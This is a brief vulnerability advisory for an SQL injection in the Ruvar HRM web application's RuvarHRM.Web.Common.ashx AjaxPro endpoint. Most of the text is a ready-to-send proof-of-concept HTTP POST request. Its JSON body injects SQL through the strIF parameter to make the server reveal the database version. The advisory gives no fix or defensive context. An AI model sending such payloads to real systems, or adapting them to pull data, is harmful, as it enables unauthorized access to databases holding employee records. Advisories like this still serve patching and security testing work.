Ruvar HRM RuvarHRM.Web.Common.ashx SQL Injection Vulnerability

Date: 2025-10-29 | Affected software: ruvar_hrm | PoC: public

Vulnerability description

SQL injection vulnerability in Ruvar HRM RuvarHRM.Web.Common.ashx.

PoC code

POST /ajaxpro/RuvarHRM.Web.Common.get_account_by_tree,RuvarHRM.Web.Common.ashx HTTP/1.1
Host: 
Content-Type: application/json
X-Ajaxpro-Method: SearchUsers

{"strIF":"1=1) and 1=@@version--","deptPv":"0","strUserType":"all"}